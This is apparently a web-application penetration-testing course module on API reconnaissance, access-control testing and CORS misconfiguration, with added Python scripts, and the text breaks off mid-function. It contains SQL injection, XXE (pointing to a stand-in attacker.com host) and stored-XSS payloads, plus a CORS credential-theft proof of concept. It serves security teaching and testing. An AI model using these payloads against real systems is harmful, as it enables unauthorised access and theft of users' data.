114 Pentesting APIs and Cloud Applications

The document discusses APIs and API testing. It introduces APIs and their main types, SOAP and REST. It describes typical API elements like requests, responses, and documentation files. It also discusses tools that can help test APIs and generate valid requests. The document focuses on understanding and attacking API-based applications.


Web Application Penetration Testing eXtreme

Pentesting APIs & Cloud Applications
Section 01 | Module 14
© Caendra Inc. 2020
All Rights Reserved
Table of Contents

MODULE 14 | PENTESTING APIs & CLOUD APPLICATIONS

14.1 Introduction to APIs
14.2 API Testing & Attacking
14.3 API Access Control
14.4 Resource Sharing
14.5 Attacking Cloud Based Applications

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.2


Learning Objectives

By the end of this module, you should have a better understanding of:

✓ Attacking API based applications
✓ Common vulnerabilities found in Cloud environments


14.1 Introduction to APIs


14.1 Introduction to APIs

API stands for Application Programming Interface. It is a non-GUI collection of endpoints exposed in a standardized form, so that it can be used by a human as well as by a machine. It is often accompanied by documentation in both a machine-readable and a human-readable form.

There are many kinds of APIs, for example the Windows API or remote APIs such as RPC (Remote Procedure Call), but we will focus on web APIs, mainly:
• Web services (SOAP/XML)
• REST APIs (JSON)

14.1 Introduction to APIs

From a technical standpoint, an API differs from a website because:
• It has a standardized input/output form, so that it can be scripted.
• It is language independent (it should work on each platform in the same way).
• It is designed around a fixed set of predefined methods, which limits what a client can ask for. As the rest of this module shows, that does not make the parameters of those methods, the parser, or the access control around them safe.

14.1 Introduction to APIs

A SOAP API uses the Simple Object Access Protocol to define the communication standard: what the request and the response look like, and how parameters are passed in them.



14.1 Introduction to APIs

SOAP messages (HTTP requests) are XML documents and must contain some special elements:
• The content type application/soap+xml belongs to SOAP 1.2; text/xml is used by SOAP 1.1 and is also common.
• The SOAPAction header sometimes just carries a namespace URI and sometimes must hold the name of the called method. Servers may route on it or reject a request whose SOAPAction does not match the body, so keep it consistent when you modify requests.

POST /Uripath HTTP/1.1
Host: www.example.com
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 299
SOAPAction: "http://www.w3.org/2003/05/soap-envelope"

<?xml version="1.0"?>
<soap:Envelope
  xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
  xmlns:m="http://www.example.com">
  <soap:Header>
  </soap:Header>
  <soap:Body>
    <m:MethodName>
      <m:ParamName>PARAMETER VALUE</m:ParamName>
    </m:MethodName>
  </soap:Body>
</soap:Envelope>



14.1 Introduction to APIs

Here is a sample response, which follows the SOAP standard and is in XML format:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <MethodResult xmlns="http://tempuri.org/">
      <ResultValue>TheValue</ResultValue>
    </MethodResult>
  </soap:Body>
</soap:Envelope>



14.1 Introduction to APIs

As said previously, an API is accompanied by both human- and machine-readable documentation. For SOAP-based APIs, the documentation is a WSDL (Web Services Description Language) file. Usually, it is served when the ?wsdl query string is appended to the service URL, for example https://api.example.com/api/?wsdl.

You can take a look at an exemplary calculator service online at:
http://www.dneonline.com/calculator.asmx

14.1 Introduction to APIs

At the following address, http://www.dneonline.com/calculator.asmx?op=Add, you can see an exemplary SOAP request that is issued in order to talk to the calculator service.

You can also see the full WSDL file at:
http://www.dneonline.com/calculator.asmx?wsdl



14.1 Introduction to APIs

As you can see, reconstructing each method separately to create a valid request would be a time-consuming task. To turn the WSDL document into working requests, we can use automated tools, which will be presented in the next chapter.



14.1 Introduction to APIs

This kind of interface, equipped with documentation that can be parsed by a machine, allows us to expose a large number of methods, each with its own purpose.

Another type of API is the REST (Representational State Transfer) API. Usually, the method the client is about to call is part of the resource path:
GET /api/v2/methodName

14.1 Introduction to APIs

Depending on the request type, the parameters might be passed differently.

In REST APIs, HTTP methods have a special meaning:
• GET – Read resource
• POST – Create resource
• PUT – Update (replace) resource
• DELETE – Delete resource
• PATCH – Update resource partially

14.1 Introduction to APIs

Except for GET requests, API method parameters are usually passed in the request body (resource identifiers also commonly appear in the path).

Remember that the meaning of these methods is a common practice and not a requirement, so technically it is possible that a method you encounter does something different (e.g., POST is used for logging in).



14.1 Introduction to APIs

An exemplary REST API request can be seen below:

POST /api/2.2/auth/signin HTTP/1.1
Host: my-server
Content-Type: application/json
Accept: application/json

{
  "credentials": {
    "name": "administrator",
    "password": "passw0rd",
    "site": {
      "contentUrl": ""
    }
  }
}

• The path often contains the API version.
• The Content-Type: application/json header is required.
• Parameters are passed as a JSON document (here a nested object, not an array).

14.1 Introduction to APIs

It is also often possible to pass the REST API parameters as XML, so the equivalent of the request from the previous slide would look like this:

POST /api/2.2/auth/signin HTTP/1.1
Host: my-server
Content-Type: text/xml

<tsRequest>
  <credentials name="administrator" password="passw0rd">
    <site contentUrl="" />
  </credentials>
</tsRequest>



14.1 Introduction to APIs

REST APIs also have a documentation standard called WADL (Web Application Description Language). A sample WADL can be viewed here:
https://www.w3.org/Submission/wadl/

Similar to WSDL, we will shortly present tools that parse the lengthy file so that you do not have to rewrite all the methods manually.



14.1 Introduction to APIs

In order to make developers' (and penetration testers') lives easier, some APIs include a more human-friendly API representation. For example, a very popular API description format and toolset named Swagger (now OpenAPI) is often found with its demo page, Swagger UI, which contains a form with a description for each method and the possibility to issue a request to it. The underlying machine-readable description (typically swagger.json or openapi.json) is as useful to a tester as a WSDL.

You can see a sample Swagger API here:
https://swagger.io/tools/swagger-ui/. Click on "Live Demo" to try it yourself.

14.1 Introduction to APIs

You can find more resources on APIs at the links below:
• https://swagger.io/
• https://www.w3.org/TR/wsdl.html
• https://www.w3.org/Submission/wadl/
• https://www.w3.org/TR/soap/



14.2 API Testing and Attacking


14.2 API Testing and Attacking

APIs are built so that one request path (one endpoint) allows us to call one method (execute one type of action). The path we are requesting is an abstract mapping to some resource; that means that when requesting the endpoint /api/v3/methodName, the path does not reflect the file/directory structure on the server.



14.2 API Testing and Attacking

The request is processed by a routing component that maps the path to certain operation handlers and not to physical file/directory resources.

However, do not be discouraged from using your favorite content discovery tools on an API-enabled server. Some server paths are mapped to the API routines, but other requests can still be handled by the web server in the usual way, allowing it to expose files and directories to the user.

14.2 API Testing and Attacking

It is possible that when you request /api/anything, every character past "anything" is parsed by the API engine, but you can still find interesting files on the server under, for example, /version.txt.

Regardless of the fact that APIs make use of predefined methods, you should be aware that there can still be vulnerabilities related to:
• Parameters to these predefined functions
• The API parsing itself
• Access to sensitive methods

14.2 API Testing and Attacking

We will cover each of these cases in the following slides.

First, when you encounter an API during a penetration test, you should focus on proper reconnaissance of the API interface, which includes:
• What is the API name and version? Is it a custom implementation or, for example, an open-source product?
• Is there any online documentation available? Are there any interesting methods?

14.2 API Testing and Attacking

• Does the documentation exist on the target server (?wsdl, ?wadl, swagger.json or similar)?
• Does the API require authentication, or is it publicly available?
• If there is both local and public documentation for an API, do they match? Maybe some methods were hidden from local users (typically ones that allow insecure operations).

14.2 API Testing and Attacking

Your purpose is to gather as many API endpoints as possible and to be able to talk to them. You should also try to obtain the WSDL/WADL file for further testing.

Reconstructing API calls from a raw WSDL/WADL file would be time-consuming, so a proper tool helps you do it faster. For API testing and for parsing WSDL/WADL files into a ready-to-use method set, you might want to use Postman, the free edition of SoapUI, or the Burp Suite Pro extension called Wsdler.

14.2 API Testing and Attacking

You can download a standalone installer of SoapUI from its homepage. We will present its usage on Kali Linux.

At the time of the release of the course, the latest version is 5.5.0.
https://www.soapui.org/downloads/latest-release.html

14.2 API Testing and Attacking

SoapUI can be launched from its default location:
/usr/local/bin/SoapUI-5.5.0

Otherwise, use the "locate SoapUI" command to find the software.



14.2 API Testing and Attacking

Once the software is launched, you can first connect it to a proxy, in this case the Burp Suite instance. This way, you will be able to replay and change requests issued to the API. To set up the proxy, go to File → Preferences → Proxy Settings and point it to the Burp instance.



14.2 API Testing and Attacking

You can then switch proxying on and off by clicking the Proxy button on the upper menu.



14.2 API Testing and Attacking

Let's now try to parse a sample WSDL/WADL file. There are sample files shipped with the software itself.

In order to load a WSDL (for SOAP) or WADL (for REST), click the respective buttons in the SoapUI upper menu.

14.2 API Testing and Attacking

By default, you can find example WSDL/WADL files in /root/SoapUI-Tutorials/WSDL-WADL/.



14.2 API Testing and Attacking

If you now click on a tree node and then double click on "Request", a request window will appear. In this case, we are viewing the "login" method.



14.2 API Testing and Attacking

The method can be found in the WSDL file as well. SoapUI automatically fills argument placeholders with "?". It is you who should decide what to put there. In this case, we see that the application expects an argument of type "String".

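What SoapUI does at this step can be scripted, which is handy when you need hundreds of requests for the access-control tests later in this module. The following is an added example, not code from the course or from SoapUI: it parses a small, constructed document/literal WSDL, lists every operation with its parameter types, emits the SOAP 1.1 envelope with "?" placeholders exactly where SoapUI would put them, and then fills in values either escaped or wrapped in a CDATA section so the envelope stays well-formed even when the payload contains markup (the technique the later "storeData" slide uses). The service namespace, the operations and the host/path used by render_http() are assumptions made for this example.

```python
"""Build ready-to-send SOAP requests from a WSDL, the way SoapUI does when it
imports a service and fills every argument with "?".

Added example, not code from the course or from SoapUI. SAMPLE_WSDL is a
constructed, minimal document/literal WSDL; its namespace and operations, and
the host/path used by render_http(), are made up for this example.
"""
import html
import xml.etree.ElementTree as ET

NS = {"wsdl": "http://schemas.xmlsoap.org/wsdl/",
      "xsd": "http://www.w3.org/2001/XMLSchema",
      "soap": "http://schemas.xmlsoap.org/wsdl/soap/"}

SAMPLE_WSDL = """<?xml version="1.0"?>
<definitions targetNamespace="http://www.example.com/sample/"
    xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:tns="http://www.example.com/sample/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <types><xsd:schema targetNamespace="http://www.example.com/sample/">
    <xsd:element name="login"><xsd:complexType><xsd:sequence>
      <xsd:element name="username" type="xsd:string"/>
      <xsd:element name="password" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
    <xsd:element name="storeData"><xsd:complexType><xsd:sequence>
      <xsd:element name="text" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
  </xsd:schema></types>
  <message name="loginIn"><part name="p" element="tns:login"/></message>
  <message name="storeDataIn"><part name="p" element="tns:storeData"/></message>
  <portType name="SamplePort">
    <operation name="login"><input message="tns:loginIn"/></operation>
    <operation name="storeData"><input message="tns:storeDataIn"/></operation>
  </portType>
  <binding name="SampleBinding" type="tns:SamplePort">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="login"><soap:operation soapAction="http://www.example.com/sample/login"/></operation>
    <operation name="storeData"><soap:operation soapAction="http://www.example.com/sample/storeData"/></operation>
  </binding>
</definitions>"""


def parse_wsdl(wsdl_text):
    """Map each operation to its SOAPAction, wrapper element and [(param, type)] list."""
    root = ET.fromstring(wsdl_text)
    tns = root.get("targetNamespace")
    # schema: wrapper element name -> its child parameters
    elements = {e.get("name"): [(c.get("name"), c.get("type")) for c in e.findall(".//xsd:element", NS)]
                for e in root.findall("wsdl:types/xsd:schema/xsd:element", NS)}
    # message name -> wrapper element (strip the tns: prefix)
    messages = {m.get("name"): m.find("wsdl:part", NS).get("element").split(":")[-1]
                for m in root.findall("wsdl:message", NS)}
    # binding: operation name -> SOAPAction header value
    actions = {o.get("name"): o.find("soap:operation", NS).get("soapAction", "")
               for o in root.findall("wsdl:binding/wsdl:operation", NS)}
    ops = {}
    for op in root.findall("wsdl:portType/wsdl:operation", NS):
        name = op.get("name")
        wrapper = messages[op.find("wsdl:input", NS).get("message").split(":")[-1]]
        ops[name] = {"action": actions.get(name, ""), "element": wrapper,
                     "namespace": tns, "params": elements[wrapper]}
    return ops


def xml_text(value, cdata=False):
    """Escape a parameter value, or wrap it in a CDATA section so that markup such
    as <script> reaches the backend untouched without breaking the envelope."""
    value = str(value)
    if cdata:   # a literal "]]>" inside the payload would end the section early
        return "<![CDATA[" + value.replace("]]>", "]]]]><![CDATA[>") + "]]>"
    return html.escape(value, quote=False)


def build_envelope(op, values=None, cdata=()):
    """SOAP 1.1 envelope for `op`; parameters without a value get "?" like SoapUI."""
    values = values or {}
    lines = [f'<sam:{op["element"]}>']
    for name, _type in op["params"]:
        lines.append(f"  <{name}>{xml_text(values.get(name, '?'), name in cdata)}</{name}>")
    lines.append(f'</sam:{op["element"]}>')
    body = "".join(f"    {line}\n" for line in lines)
    return ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"'
            f' xmlns:sam="{op["namespace"]}">\n  <soapenv:Header/>\n  <soapenv:Body>\n'
            f"{body}  </soapenv:Body>\n</soapenv:Envelope>\n")


def render_http(op, envelope, host="api.example.com", path="/sample"):
    """Raw HTTP request text, ready to paste into Burp Repeater (host and path assumed)."""
    length = len(envelope.encode("utf-8"))
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nContent-Type: text/xml;charset=UTF-8\r\n"
            f'SOAPAction: "{op["action"]}"\r\nContent-Length: {length}\r\n\r\n{envelope}')


if __name__ == "__main__":
    ops = parse_wsdl(SAMPLE_WSDL)
    for name, op in ops.items():
        print(name, [f"{p}:{t}" for p, t in op["params"]])   # what the WSDL exposes
    print(render_http(ops["login"], build_envelope(ops["login"], {"username": "' or '1'='1"})))
    print(build_envelope(ops["storeData"], {"text": "<script>alert(1)</script>"}, cdata={"text"}))
```

Run it and paste the rendered request into Burp Repeater; the Content-Length is recomputed from the envelope, which is the detail most often wrong in hand-edited SOAP requests. The CDATA branch is what lets a stored-XSS probe travel inside a still-valid envelope; an escaped value would reach the backend as `&lt;script&gt;` instead.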


14.2 API Testing and Attacking

If you press the green button, the request will be issued and, in this case, proxied through Burp Suite.



14.2 API Testing and Attacking

Testing REST APIs can be done in exactly the same way; the difference is that you import a WADL file instead of a WSDL.

So, once you encounter a WSDL on the web application, you can copy its source (open it in a browser, view the page source, select all, then copy & paste it into a file) and import it into SoapUI.



14.2 API Testing and Attacking

Remember that an API is just another transport mechanism for data that ends up in the application back-end (database, file system, operating system, or another service).

With this in mind, you can try to tamper with everything that is transported by the API. For example, in the case of a request similar to the one presented previously, you are free to check whether the username or password field is vulnerable to injection attacks.

14.2 API Testing and Attacking

Here we see what a sample request with an SQL injection probe in the username might look like:

POST /sample HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://www.soapui.org/sample/login"
Content-Length: 297
Host: www.soapui.org
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:sam="http://www.soapui.org/sample/">
  <soapenv:Header/>
  <soapenv:Body>
    <sam:login>
      <username>' or '1'='1</username>
      <password>test</password>
    </sam:login>
  </soapenv:Body>
</soapenv:Envelope>



14.2 API Testing and Attacking

Of course, the API implementation itself might be vulnerable to XXE attacks; however, modern APIs usually disallow DTD declarations. The request below adds an external DTD reference: a parser that still loads external DTDs will fetch that URL, which gives an out-of-band (SSRF-style) signal even when nothing is reflected in the response. Note that the system identifier must be quoted for the DOCTYPE to be well-formed.

POST /sample HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://www.soapui.org/sample/login"
Content-Length: 297
Host: www.soapui.org
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<!DOCTYPE soapenv:Envelope SYSTEM "http://attacker.com/ssrf">
<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:sam="http://www.soapui.org/sample/">
  <soapenv:Header/>
  <soapenv:Body>
    <sam:login>
      <username>?</username>
      <password>?</password>
    </sam:login>
  </soapenv:Body>
</soapenv:Envelope>

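The "disallow DTD declarations" defence mentioned above is cheap to implement and easy to verify. The following is an added example, not code from the course: it runs expat over the incoming SOAP body and aborts from the DOCTYPE callback before any entity could be declared or resolved, and only then hands the document to ElementTree. The two envelopes are constructed; attacker.com is the placeholder host from the slide.

```python
"""Gate that rejects any DTD before a SOAP body is parsed, i.e. the check
that "modern APIs" apply to shut out XXE and DOCTYPE-based SSRF.

Added example, not from the course. The two envelopes are constructed: a
clean login request and the same request with the external-DTD payload from
the slide (attacker.com is the slide's placeholder host).
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

CLEAN = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:sam="http://www.soapui.org/sample/"><soapenv:Body><sam:login>
<username>alice</username><password>s3cret</password></sam:login></soapenv:Body></soapenv:Envelope>"""

WITH_DTD = b'<!DOCTYPE soapenv:Envelope SYSTEM "http://attacker.com/ssrf">\n' + CLEAN


class DtdNotAllowed(ValueError):
    pass


def reject_dtd(xml_bytes):
    """Run expat over the document and abort as soon as a DOCTYPE appears.
    Nothing is resolved or fetched: expat only reports the declaration and we
    raise from the callback before any entity handling could happen."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} with SYSTEM {system_id!r} rejected")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)
    return True


def is_dtd_free(xml_bytes):
    """Boolean form of the gate, for callers that prefer a verdict to an exception."""
    try:
        return reject_dtd(xml_bytes)
    except DtdNotAllowed:
        return False


def parse_login(xml_bytes):
    """Parse a SOAP login body safely: DTD gate first, then ElementTree."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    body = root.find("{http://schemas.xmlsoap.org/soap/envelope/}Body")
    login = body.find("{http://www.soapui.org/sample/}login")
    return {"username": login.findtext("username"), "password": login.findtext("password")}


if __name__ == "__main__":
    print(parse_login(CLEAN))
    try:
        parse_login(WITH_DTD)
    except DtdNotAllowed as err:
        print("blocked:", err)
```

When you are on the attacking side, the same gate tells you quickly whether a target's behaviour matches "rejects DTD" (an error or a generic 400 the moment a DOCTYPE is present) or whether it silently accepts the declaration, in which case the out-of-band fetch is worth waiting for.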


14.2 API Testing and Attacking

Basically, you are free to tamper with any of the API parameters as long as the SOAP message structure stays correct.

In case you want to smuggle XML-style data, you can wrap it in a CDATA section (character data that the XML parser does not interpret as markup; it is not a comment), so the SOAP message remains valid while the raw payload reaches the backend:

POST /storeData HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "StoreData"
Content-Length: 297
Host: www.soapui.org
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:sam="http://www.soapui.org/sample/">
  <soapenv:Header/>
  <soapenv:Body>
    <sam:storeData>
      <text><![CDATA[<script>alert('stored xss!')</script>]]></text>
    </sam:storeData>
  </soapenv:Body>
</soapenv:Envelope>

14.3 API Access Control


14.3 API Access Control

In larger APIs, not every method is designed to be used by every user. For example, the most common split is between read-only users and read+write users. The latter have the possibility to modify the contents of the API backend.

In APIs, you will rarely see cookies being used. More often, the authentication mechanism will be HTTP Basic authentication or a kind of token. It can be a pre-generated token that is the equivalent of a cookie, for example in the form of a header like X-Api-Token: adk32Kds38au39aU0s.

14.3 API Access Control

Because of such API requirements, specific content types or custom headers are used along with non-cookie authentication. These make Cross-Site Request Forgery much less likely: a browser does not attach a custom header or a token held by script automatically, and a cross-origin request carrying a custom header or a non-form content type triggers a CORS preflight instead of being sent blindly.

However, what is often found in APIs is broken access control. For example, authorization bypasses are very common.

14.3 API Access Control

In order to test an API thoroughly for access control flaws, one needs to:
• Prepare a working request to each API endpoint
• Generate a token (or authorization header) for each of the API users (roles)
• Combine each API request with each token to see which combinations work and which do not
• Remember to test each request without any token as well

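The four steps above are a matrix: endpoints on one axis, callers (no token plus one token per role) on the other, and the documented minimum role as the expected result for each cell. The following is an added example, not from the course, that runs that matrix against a constructed local stand-in for the API so it works offline. The endpoint names, the X-Api-Token values and the missing role check on the delete endpoint are all made up for the example; the harness part (access_matrix and find_violations) is what you would point at a real base URL, with call() swapped for requests captured through Burp.

```python
"""Access-control matrix test: every API endpoint is called with every user's
token and with no token, and the outcome is compared with the intended policy.

Added example, not from the course. The API is a constructed local stand-in
(http.server on 127.0.0.1) with a made-up X-Api-Token scheme; the missing
role check on /api/v1/users/delete is deliberate so the harness has a
finding to report.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKENS = {"reader": "rd-3f9a1c", "writer": "wr-7b2e4d", "admin": "ad-c0ffee"}   # constructed
ROLE_RANK = {None: 0, "reader": 1, "writer": 2, "admin": 3}

# Documented policy: minimum role per endpoint.
POLICY = {"/api/v1/items": "reader",
          "/api/v1/items/create": "writer",
          "/api/v1/users/delete": "admin"}
# What the buggy server really enforces: delete only checks that *a* token is valid.
ENFORCED = {**POLICY, "/api/v1/users/delete": "reader"}


class ApiHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))   # drain the body
        token = self.headers.get("X-Api-Token")
        role = next((r for r, t in TOKENS.items() if t == token), None)
        need = ENFORCED.get(self.path)
        if need is None:
            code, body = 404, {"error": "not found"}
        elif role is None:
            code, body = 401, {"error": "token required"}
        elif ROLE_RANK[role] < ROLE_RANK[need]:
            code, body = 403, {"error": "forbidden"}
        else:
            code, body = 200, {"ok": True, "as": role}
        data = json.dumps(body).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # keep the harness output readable
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), ApiHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


def call(base, path, token):
    """POST to one endpoint with one token (or none) and return the HTTP status."""
    req = urllib.request.Request(base + path, data=b"{}", method="POST",
                                 headers={"Content-Type": "application/json"})
    if token:
        req.add_header("X-Api-Token", token)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def access_matrix(base):
    """{(path, role): status} for every endpoint x (no token + each user's token)."""
    return {(path, role): call(base, path, TOKENS.get(role))
            for path in POLICY for role in [None, *TOKENS]}


def find_violations(matrix):
    """Endpoints that answered 200 to a caller below the documented minimum role."""
    return sorted((path, role) for (path, role), status in matrix.items()
                  if status == 200 and ROLE_RANK[role] < ROLE_RANK[POLICY[path]])


if __name__ == "__main__":
    srv, base = start_server()
    matrix = access_matrix(base)
    for (path, role), status in matrix.items():
        print(f"{status}  {role or '(no token)':>10}  {path}")
    print("violations:", find_violations(matrix))
    srv.shutdown()
```

Against the constructed server the report names the delete endpoint twice (reader and writer both get 200). On a real target, keep the "no token" row: a 200 there is the cheapest finding in the whole matrix, and a 403 versus 401 difference tells you whether the endpoint even looked at the token.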
14.3 API Access Control

Again, such test cases can be generated using SoapUI, which allows us to issue a request to each API endpoint. Also, as a reminder, double-check whether the API implementation exposes all the methods provided by the original product, not only the documented ones.

For example, the Rundeck API has a built-in possibility of running OS commands, which might be hidden from the documentation of a local API deployment:
• https://docs.rundeck.com/docs/api/rundeck-api.html#adhoc

14.3 API Access Control

API tokens are susceptible to the vulnerabilities commonly diagnosed in session cookies, for example:
• Low entropy or predictable value
• Lack of invalidation (no expiry, no revocation on logout or credential change)
• Possible token leaks from the application infrastructure (logs, URLs, error pages) or the possibility to generate tokens in advance



14.3 API Access Control

Specific tokens that might grant you access to an API interface are JWTs, as well as the so-called Bearer authentication (Authorization: Bearer <token>).

These tokens will be explained in more detail in the "Attacking Authentication & SSO" module.



14.4 Resource Sharing


14.4 Resource Sharing

As APIs are often used both by humans and by machines, the latter have to be able to read the API results using scripted solutions.

Let's say you want to get the content of a different website, example.com, on your webpage. Consider the following code:

<html><head>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    alert(xhr.responseText);
  }
};
xhr.open('GET', 'http://example.com', true);
xhr.send(null);
</script></head></html>

14.4 Resource Sharing

If you now try to read the response content of the example.com page, it will be blocked by the browser.

Likewise, if someone visits a site with a similar script that tries to send the response content somewhere instead of just displaying it, the same constraint applies. It will not be possible for the client-side JavaScript to read the response, due to Same Origin Policy restrictions (the request itself is sent; it is the response that the browser withholds from the script).

14.4 Resource Sharing

As APIs are meant to be accessed by automated agents as well, the Cross-Origin Resource Sharing (CORS) standard was introduced to loosen the SOP constraints a bit.

Simply put, CORS can add some exceptions to the SOP by specifying special headers in the server response.



14.4 Resource Sharing

We will be interested in two of these headers:
• Access-Control-Allow-Origin: [value]
• Access-Control-Allow-Credentials: [true/false]

The first one specifies which origin may read a certain response, while the second one specifies whether credentials (e.g., cookies) may be included in the request with the response still being readable.

14.4 Resource Sharing

The Access-Control-Allow-Origin value can be a single origin (scheme, host and port), a wildcard (*), or null.

A wildcard means that a script hosted on any origin can read a response from that webpage.

A specific origin value means that only scripts from that origin can read the response. Note that the header carries exactly one origin per response, so servers that want to allow several usually echo the request's Origin header after checking it; that check is where mistakes happen.

14.4 Resource Sharing

For example, if the page victim.com sends back the header Access-Control-Allow-Origin: https://example.com (the value must be the full origin), then a script hosted on example.com that issues an XHR to victim.com will be allowed to read the response when a user visits example.com.

However, if victim.com is a static, public page, then nothing special happens: the attacker only reads what they could fetch directly anyway. It becomes interesting when victim.com also sends Access-Control-Allow-Credentials: true.

14.4 Resource Sharing

In that case, if the user is logged in to victim.com and visits the mentioned script on example.com, victim.com will be requested in the context of the logged-in user (the cookies are sent with the XHR when it sets withCredentials = true) and restricted content can be stolen!

Browsers block responses that are permissive in a contradictory way: a wildcard origin together with Access-Control-Allow-Credentials: true is refused by the browser. That is why vulnerable servers reflect the request's Origin instead of using a wildcard.

14.4 Resource Sharing

Trusting an arbitrary origin with credentials is a common vulnerability, not only in APIs.

That means that if a page is accessible only to logged-in users and it trusts an arbitrary origin, an exploit script can be hosted on an attacker-controlled domain. Once visited by a user logged in on the target website, it can steal sensitive information, such as user data or CSRF tokens.

14.4 Resource Sharing

Let's take a look at a simple exploitation case. We will issue a similar XHR request to a CORS-enabled page.

The following file is hosted on a PHP-enabled Apache server. It reflects whatever Origin the request carries, which is the vulnerable pattern:

<?php
header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
header("Access-Control-Allow-Credentials: true");

echo "TOP SECRET STUFF";
?>



14.4 Resource Sharing

If you now navigate to that page while using Burp Suite as a proxy, you can observe how it reacts to a custom "Origin" header: the same value comes back in Access-Control-Allow-Origin.



14.4 Resource Sharing

The XHR script is now modified and example.com is replaced with the CORS-enabled page:

<html><head>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    alert(xhr.responseText);
  }
};
xhr.open('GET', 'http://192.168.139.195/cors.php', true);
// Send the victim's cookies along; needed to read content that requires a login.
xhr.withCredentials = true;
xhr.send(null);
</script></head></html>



14.4 Resource Sharing

You can now observe that access to the response was gained. In an exploitation scenario, you may instead want to send this data to a server under your control, in the same way you would steal a cookie using an XSS vulnerability.

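The Burp step above (change the Origin header, watch what comes back) is worth automating, because the interesting cases are not only "attacker.com": the null origin that sandboxed iframes and local files produce, and look-alike hosts that defeat prefix or suffix matching, are reflected just as often. The following is an added example, not from the course: it starts two constructed local stand-ins for cors.php, one that reflects the Origin like the PHP above and one fixed with an exact-match allow-list, and reports which probed origins come back reflected together with Access-Control-Allow-Credentials: true. All host names are made up; point probe() at a real URL to use it as a checker.

```python
"""Probe a CORS policy the way you would from Burp: send the same request with
several Origin values and see which of them come back reflected together with
Access-Control-Allow-Credentials: true.

Added example, not from the course. The two local servers are constructed
stand-ins for cors.php: one reflects the Origin header (the vulnerable pattern
from the slide), the other checks an exact-match allow-list. All host names
are made up.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

SECRET = b"TOP SECRET STUFF"
TRUSTED = {"https://app.victim.example", "https://admin.victim.example"}

# Origins a tester sends: an attacker site, the "null" origin that sandboxed
# iframes and local files produce, a look-alike that defeats naive prefix checks,
# and one origin that really is trusted.
PROBES = ["https://attacker.example", "null",
          "https://app.victim.example.attacker.example", "https://app.victim.example"]


def make_handler(reflect):
    class CorsHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            origin = self.headers.get("Origin")
            self.send_response(200)
            if reflect and origin is not None:
                # Vulnerable (cors.php): echo whatever Origin arrived, with credentials.
                self.send_header("Access-Control-Allow-Origin", origin)
                self.send_header("Access-Control-Allow-Credentials", "true")
            elif origin in TRUSTED:
                # Fixed: exact match against an allow-list; Vary keeps caches from
                # serving one origin's CORS headers to another.
                self.send_header("Access-Control-Allow-Origin", origin)
                self.send_header("Access-Control-Allow-Credentials", "true")
                self.send_header("Vary", "Origin")
            self.send_header("Content-Length", str(len(SECRET)))
            self.end_headers()
            self.wfile.write(SECRET)

        def log_message(self, *args):
            pass
    return CorsHandler


def start(reflect):
    srv = HTTPServer(("127.0.0.1", 0), make_handler(reflect))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}/cors"


def probe(url, origin):
    """Return (Access-Control-Allow-Origin, Access-Control-Allow-Credentials) for one Origin."""
    req = urllib.request.Request(url, headers={"Origin": origin})
    with urllib.request.urlopen(req) as resp:
        return (resp.headers.get("Access-Control-Allow-Origin"),
                resp.headers.get("Access-Control-Allow-Credentials"))


def exploitable_origins(url):
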